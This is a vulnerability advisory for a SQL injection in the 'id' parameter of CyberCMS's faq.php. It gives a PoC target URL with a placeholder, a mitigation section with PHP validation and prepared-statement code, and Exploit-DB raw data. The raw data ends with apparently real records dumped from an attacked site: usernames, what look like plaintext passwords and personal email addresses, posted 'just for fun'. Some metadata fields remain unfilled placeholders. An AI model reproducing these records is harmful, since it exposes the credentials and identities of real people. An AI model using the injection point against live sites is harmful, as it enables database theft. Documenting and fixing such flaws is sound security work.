Vendor: CyberCMS
Author: hc0de
CVSS: 8.8 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: CyberCMS
Affected Version From: [app version]
Affected Version To: [app version]
Patch Exists: NO
Related CWE: N/A
CPE: a:cyberfusion:cyber-cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Linux 9.04
Date: 2009

CyberCMS Remote SQL Injection Vuln.

CyberCMS is vulnerable to remote SQL injection. An attacker can exploit it by supplying malicious SQL in the 'id' parameter of faq.php, which allows access to the MySQL database, including usernames and passwords. The PoC output lists the MySQL version as 5.0.37-community-nt and the database name as uskole.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
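As an added illustration of the mitigation (this is not code from CyberCMS or from the advisory's author), the hypothetical faq.php handler below shows the unsafe pattern the advisory describes beside a hardened version that validates 'id' as a positive integer and binds it through a prepared statement. The table and column names, the connection details and the mysqli/mysqlnd setup are assumptions.

```php
<?php
// Added example, not CyberCMS code: a hypothetical faq.php handler.
// Assumes a MySQL table `faq` with columns `id`, `question`, `answer`,
// and a mysqli build with mysqlnd (needed for get_result()).

// Unsafe pattern: the attacker-controlled 'id' is concatenated into the query,
// so anything placed in the parameter becomes part of the SQL statement.
function faq_lookup_unsafe(mysqli $db, string $id): ?array
{
    $sql = "SELECT question, answer FROM faq WHERE id = " . $id; // SQL injection
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened pattern: reject anything that is not a positive integer before
// touching the database, then bind the value instead of splicing it in.
function faq_lookup_safe(mysqli $db, string $id): ?array
{
    $valid = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($valid === false) {
        return null;
    }
    $stmt = $db->prepare("SELECT question, answer FROM faq WHERE id = ?");
    $stmt->bind_param('i', $valid);   // 'i' = integer parameter
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Placeholder connection details (assumed, replace with real configuration).
$db = new mysqli('localhost', 'app_user', 'app_password', 'app_db');
$db->set_charset('utf8mb4');

$row = faq_lookup_safe($db, $_GET['id'] ?? '');
if ($row === null) {
    http_response_code(404);
    exit('FAQ entry not found');
}
// Encode output so a stored answer cannot inject HTML either.
echo '<h2>' . htmlspecialchars($row['question'], ENT_QUOTES, 'UTF-8') . '</h2>';
echo '<p>' . htmlspecialchars($row['answer'], ENT_QUOTES, 'UTF-8') . '</p>';
```

The integer check alone already closes the reported issue for this parameter; the prepared statement is what keeps the handler safe if the column type or the input source changes later, and the application account should also be granted only SELECT on the tables faq.php needs.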

Exploit-DB raw data:

# Exploit Title: CyberCMS Remote SQL Injection Vuln.
# Date: 26/11/2009
# Author: hc0de | http://hc0de.blogspot.com
# Software Link: http://cyberfusion.ramx.org/cyber-cms
# Version: [app version]
# Tested on: Ubuntu Linux 9.04
# CVE :
# PoC:

+Target: http://server/faq.php?id=SQL_CODE

-MySQL Version: 5.0.37-community-nt
-MySQL User: skoleung@localhost
-MySQL Database: uskole

+Datas:
3:memborg:memborg:1:memborg@cyberfusion.dk
6:Leder:huskerikke:1:john.landbo@morsoe.dk
...etc.. :) just for fun :P